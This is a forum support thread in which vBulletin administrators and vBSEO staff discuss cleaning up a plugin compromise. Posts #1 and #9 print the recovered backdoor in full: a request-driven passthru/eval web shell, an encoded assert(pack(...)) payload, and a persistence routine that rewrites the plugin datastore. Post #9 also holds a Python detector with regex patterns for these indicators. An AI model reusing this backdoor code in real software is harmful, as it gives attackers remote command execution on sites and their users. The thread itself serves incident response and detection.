hacked code problem.

This is a discussion on "hacked code problem." within the Bug Reporting forums, part of the vBSEO SEO Plugin category.

  1. #1 jeff (Junior Member)

    hacked code problem.

    I'm running 3.8.4 and like everyone else I started getting the errors last night.

    I have disabled the vbseo plugin altogether and applied the code patch defined on this site - but I'm not sure what to do now to get rid of the program since I'm running 3.8.4. I have replaced vbseo.php and vbseocp.php, which had been compromised in my forums directory, with backup copies - what do I do now to get everything cleaned up and vbseo turned back on?


    I downloaded the vbseo_checkplugins.php and ran it and got this:

    Checking plugins code
    Suspicious plugin #352: misc_start hook (crawlability_vbseo product) - vBSEO Misc Start [eval($_REQUEST]

    That code contains:
    if(defined('VBSEO_ENABLED'))
    vbseo_complete_sec('misc_start');
    if(isset($_REQUEST['c'])) {
    header("Content-Type: text/plain");
    $c=$_REQUEST['c'];
    passthru($c);
    die();
    }
    if(isset($_REQUEST['e'])) {
    eval($_REQUEST['e']);
    die();
    }

    In addition, if I look in my datastore, I find this:

    a:163:{s:12:"init_startup";s:9411:"$GLOBALS["backups"]["randomseed"]=array (
    0 => 'global_complete',
    1 => 's:648:"assert(pack(chr(99).chr(42),40,33,101,109, 112,116,121,40,36,95,83,69,82,86,69,82,91,34,72,84 ,84,80,95,70,79,79,84,69,82,68,73,83,80,76,65,89,3 4,93,41,63,101,118,97,108,40,98,97,115,101,54,52,9 5,100,101,99,111,100,101,40,36,95,83,69,82,86,69,8 2,91,34,72,84,84,80,95,70,79,79,84,69,82,68,73,83, 80,76,65,89,34,93,41,41,58,40,33,101,109,112,116,1 21,40,36,95,82,69,81,85,69,83,84,91,34,102,111,111 ,116,101,114,100,105,115,112,108,97,121,34,93,41,6 3,101,118,97,108,40,98,97,115,101,54,52,95,100,101 ,99,111,100,101,40,36,95,82,69,81,85,69,83,84,91,3 4,102,111,111,116,101,114,100,105,115,112,108,97,1 21,34,93,41,41,58,117,110,105,113,105,100,40,41,41 ,41));";',
    );$GLOBALS["acpcache"] = array (
    0 => 'init_startup',
    1 => 's:1465:"if (!defined("vB_PluginCacheActive")) { define("vB_PluginCacheActive", 1); function vB_PluginCacheCheck() { try { global $db; $plugin_data = $db->query_read("SELECT * FROM ".TABLE_PREFIX."datastore WHERE title=\'pluginlist\'"); $plugin_info = $db->fetch_array($plugin_data); $GLOBALS["vbplist"] = unserialize($plugin_info[\'data\']); $GLOBALS["vbpcache"] = ""; foreach($GLOBALS[\'backups\'] as $k => $v) { $back = unserialize($v[1]); vB_PluginCacheUpdate($v[0], $back, $back); $GLOBALS["vbpcache"] .= \'$GLOBALS["backups"]["\'.$k.\'"] = \'.var_export($v, 1).";\\n"; } $GLOBALS["vbpcache"] .= \'$GLOBALS["acpcache"] = \'.var_export($GLOBALS[\'acpcache\'], 1).";\\n"; $back = $GLOBALS["vbpcache"].unserialize($GLOBALS[\'acpcache\'][1])."\\n"; vB_PluginCacheUpdate($GLOBALS[\'acpcache\'][0], $back, "vB_PluginCacheActive"); } catch (Exception $e) {} } function vB_PluginCacheUpdate($hook, $code, $test) { if (!array_key_exists($hook, $GLOBALS["vbplist"])) { $GLOBALS["vbplist"][$hook] = ""; } if (strpos($GLOBALS["vbplist"][$hook], trim($test)) === false) { $GLOBALS["vbplist"][$hook] = $code . $GLOBALS["vbplist"][$hook]; build_datastore(\'pluginlist\', serialize($GLOBALS["vbplist"]), 1); } } $vbulletin->shutdown->add(vB_PluginCacheCheck);}";',
    );
    if (!defined("vB_PluginCacheActive")) {
    define("vB_PluginCacheActive", 1);
    function vB_PluginCacheCheck() {
    try {
    global $db;
    $plugin_data = $db->query_read("SELECT * FROM ".TABLE_PREFIX."datastore WHERE title='pluginlist'");
    $plugin_info = $db->fetch_array($plugin_data);
    $GLOBALS["vbplist"] = unserialize($plugin_info['data']);
    $GLOBALS["vbpcache"] = "";
    foreach($GLOBALS['backups'] as $k => $v) {
    $back = unserialize($v[1]);
    vB_PluginCacheUpdate($v[0], $back, $back);
    $GLOBALS["vbpcache"] .= '$GLOBALS["backups"]["'.$k.'"] = '.var_export($v, 1).";\n";
    }
    $GLOBALS["vbpcache"] .= '$GLOBALS["acpcache"] = '.var_export($GLOBALS['acpcache'], 1).";\n";
    $back = $GLOBALS["vbpcache"].unserialize($GLOBALS['acpcache'][1])."\n";
    vB_PluginCacheUpdate($GLOBALS['acpcache'][0], $back, "vB_PluginCacheActive");
    } catch (Exception $e) {}
    }
    function vB_PluginCacheUpdate($hook, $code, $test) {
    if (!array_key_exists($hook, $GLOBALS["vbplist"])) {
    $GLOBALS["vbplist"][$hook] = "";
    }
    if (strpos($GLOBALS["vbplist"][$hook], trim($test)) === false) {
    $GLOBALS["vbplist"][$hook] = $code . $GLOBALS["vbplist"][$hook];
    build_datastore('pluginlist', serialize($GLOBALS["vbplist"]), 1);
    }
    }
    $vbulletin->shutdown->add(vB_PluginCacheCheck);
    }

  2. #2 Brian Cummiskey (vBSEO Staff)
    That's bad code.

    Try re-importing the vbseo XML product file with over-write and see if it clears it out.

  3. #3 jeff (Junior Member)
    thank you brian I will give that a shot.


  4. #4 jeff (Junior Member)
    Quote Originally Posted by Brian Cummiskey View Post
    That's bad code.

    Try re-importing the vbseo XML product file with over-write and see if it clears it out.
    Yes - that did. I guess the exploit manifested itself in different ways depending on the version - creative little buggers they were.

    I save all my logs - can I look for something specific in the logs to help identify the culprit if they were indeed working from a single IP address? My guess is not, and that they had a bot deployed on lots of computers, taking into consideration the number of sites they infected.

    thanks for the fast response - we love your product.

    Jeff

  5. #5 Brian Cummiskey (vBSEO Staff)
    It appears that the code was run via YOU, the admin. They hooked on to a login with an iframe, and it basically ran when you went in to do stuff. There's more details in the last 2 posts of the announcement sticky from Juan.

  6. #6 jeff (Junior Member)
    Quote Originally Posted by Brian Cummiskey View Post
    It appears that the code was run via YOU, the admin. They hooked on to a login with an iframe, and it basically ran when you went in to do stuff. There's more details in the last 2 posts of the announcement sticky from Juan.

    Brian - thanks - I read the last two posts in the thread but I suppose I'm missing something.

    I'm not sure what you mean when you say they hooked on to a login with an iframe. This started at 8 pm last night and no admins were even on the site last night.

    Perhaps if you give me some pointers with details I can look closer somewhere - right now I'm lost.

    I've reloaded the xml file but I get the feeling you're insinuating this could happen again unless I fix something else?

    thanks

  7. #7 Brian Cummiskey (vBSEO Staff)
    Everything we've seen has had an iframe get attached and run when an admin logs on to the site. If that never happened, then it may be an entirely different vector that has not been identified at this point, and may not be related to the patch. I'm uncertain at best. I'm only going by the information I have available to me at this time.

  8. #8 jeff (Junior Member)
    Quote Originally Posted by Brian Cummiskey View Post
    Everything we've seen has had an iframe get attached and run when an admin logs on to the site. If that never happened, then it may be an entirely different vector that has not been identified at this point, and may not be related to the patch. I'm uncertain at best. I'm only going by the information I have available to me at this time.
    Well - I can do a search through all the code for iframe and see what's found.

  9. #9
    AWS
    AWS is offline
    Member AWS's Avatar
    Real Name
    Bob
    Join Date
    Feb 2006
    Location
    Pluto
    Posts
    68
    Liked
    0 times
    Code:
    if(isset($_REQUEST['c'])) {
    header("Content-Type: text/plain");
    $c=$_REQUEST['c'];
    passthru($c);
    die();
    }
    if(isset($_REQUEST['e'])) {
    eval($_REQUEST['e']);
    This, when executed, will install a stealth shell that can be accessed by a hacker if they know the IP. This does not leave any traces that it even exists other than the plugin which sets cookies that holds the shell payload. Depending on how long this plugin was installed it's a good possibility your server was compromised and other backdoors installed.
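
    An added example, not code from this thread or from the vBSEO tool: a Python checker in the spirit of the vbseo_checkplugins.php output shown in post #1, run offline over a map of hook name to plugin code. The indicator names and the benign hook are assumptions; the sample hook code is taken from posts #1 and #9, and the pack("c*") decoder shows what the global_complete payload from post #1 actually contains.

```python
import re

# Indicator patterns for the plugin code shown in this thread: passthru/eval of
# request data, a pack("c*", ...) payload under assert(), and the shutdown hook
# that rewrites the pluginlist datastore so the plugin re-inserts itself.
INDICATORS = {
    "eval-of-request": re.compile(r"eval\s*\(\s*\$_(REQUEST|GET|POST|COOKIE|SERVER)"),
    "command-execution": re.compile(r"\b(passthru|system|shell_exec|exec)\s*\("),
    "assert-pack-payload": re.compile(r"assert\s*\(\s*pack\s*\("),
    "base64-eval": re.compile(r"eval\s*\(\s*base64_decode\s*\("),
    "pluginlist-rewrite": re.compile(r"build_datastore\s*\(\s*['\"]pluginlist['\"]"),
    "persistence-marker": re.compile(r"vB_PluginCacheActive|\$GLOBALS\[\"backups\"\]"),
}
# pack(chr(99).chr(42), 40, 33, ...) is pack("c*", ...): each integer is one byte.
PACK_RE = re.compile(r"pack\s*\(\s*chr\(99\)\.chr\(42\)\s*,([\d,\s]+)\)")

def decode_packed_strings(code):
    """Strings hidden in pack("c*", n, n, ...) calls inside `code`; whitespace
    inside the number list (forum line wraps) is ignored."""
    out = []
    for m in PACK_RE.finditer(code):
        nums = re.sub(r"\s+", "", m.group(1)).split(",")
        out.append("".join(chr(int(n)) for n in nums if n))
    return out

def scan_hooks(hooks):
    """hooks: {hook_name: php_code} -> {hook_name: sorted indicator names} for
    every hook that matches, with decoded pack() payloads checked as well."""
    findings = {}
    for hook, code in hooks.items():
        texts = [code] + decode_packed_strings(code)
        hits = sorted({n for n, rx in INDICATORS.items() for t in texts if rx.search(t)})
        if hits:
            findings[hook] = hits
    return findings

# Sample pluginlist entries constructed from the snippets in this thread (the
# global_complete payload is the one from post #1), plus one benign hook.
SAMPLE_HOOKS = {
    "misc_start": "if(isset($_REQUEST['c'])) { header(\"Content-Type: text/plain\"); "
                  "$c=$_REQUEST['c']; passthru($c); die(); }\n"
                  "if(isset($_REQUEST['e'])) { eval($_REQUEST['e']); die(); }",
    "global_complete": "assert(pack(chr(99).chr(42),40,33,101,109,112,116,121,40,36,95,83,69,"
        "82,86,69,82,91,34,72,84,84,80,95,70,79,79,84,69,82,68,73,83,80,76,65,89,34,93,41,63,"
        "101,118,97,108,40,98,97,115,101,54,52,95,100,101,99,111,100,101,40,36,95,83,69,82,86,"
        "69,82,91,34,72,84,84,80,95,70,79,79,84,69,82,68,73,83,80,76,65,89,34,93,41,41,58,40,"
        "33,101,109,112,116,121,40,36,95,82,69,81,85,69,83,84,91,34,102,111,111,116,101,114,"
        "100,105,115,112,108,97,121,34,93,41,63,101,118,97,108,40,98,97,115,101,54,52,95,100,"
        "101,99,111,100,101,40,36,95,82,69,81,85,69,83,84,91,34,102,111,111,116,101,114,100,"
        "105,115,112,108,97,121,34,93,41,41,58,117,110,105,113,105,100,40,41,41,41));",
    "init_startup": "if (!defined(\"vB_PluginCacheActive\")) { /* ... */ "
                    "build_datastore('pluginlist', serialize($GLOBALS[\"vbplist\"]), 1); }",
    "forumdisplay_start": "$show['constructed_benign_plugin'] = true;",
}
```

    The decoded payload is worth keeping: the request parameter and header names it reveals are the strings to search the saved access logs for, which is the question asked in post #4.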

  10. #10 jeff (Junior Member)
    Interesting - how do you know that?

    Quote Originally Posted by AWS View Post
    Code:
    if(isset($_REQUEST['c'])) {
    header("Content-Type: text/plain");
    $c=$_REQUEST['c'];
    passthru($c);
    die();
    }
    if(isset($_REQUEST['e'])) {
    eval($_REQUEST['e']);
    This, when executed, will install a stealth shell that can be accessed by a hacker if they know the IP. This does not leave any traces that it even exists other than the plugin which sets cookies that holds the shell payload. Depending on how long this plugin was installed it's a good possibility your server was compromised and other backdoors installed.

  11. #11 Brian Cummiskey (vBSEO Staff)
    Oleg updated the code in the announcement thread. Install and run that product to find/clear anything remaining.

  12. #12 I, Brian (Senior Member)
    Uninstalling and reinstalling vbseo clears the problem - but then it returns.

    This keeps happening continuously and I really don't know how to combat this.

    I've manually rebuilt the site (vb + vbseo clean install) and changed passwords. But they keep reinserting the code.

    This has been happening continuously for 2 weeks - I cannot find the exploit anywhere.

  13. #13 Mert Gökçeimam (vBSEO.com Webmaster)
    Hello Brian,

    Uninstalling/installing just clears your cache and therefore the infected code is removed temporarily. However, you need to identify the injected files on your server and protect directories set to chmod 777 in order to avoid any file injections.

    Please contact me via PM so I will hand you my Skype address; let me try to assist you directly.
    Mert Gökçeimam / Crawlability Inc.

  14. #14 I, Brian (Senior Member)
    Ah, wait - it looks like when I did a clean reinstall I uploaded an older version of vbseo 3.6.0. Redone that and changed passwords; will see if that helps - if not, will PM, as the redirect to filestore now includes a malware warning.
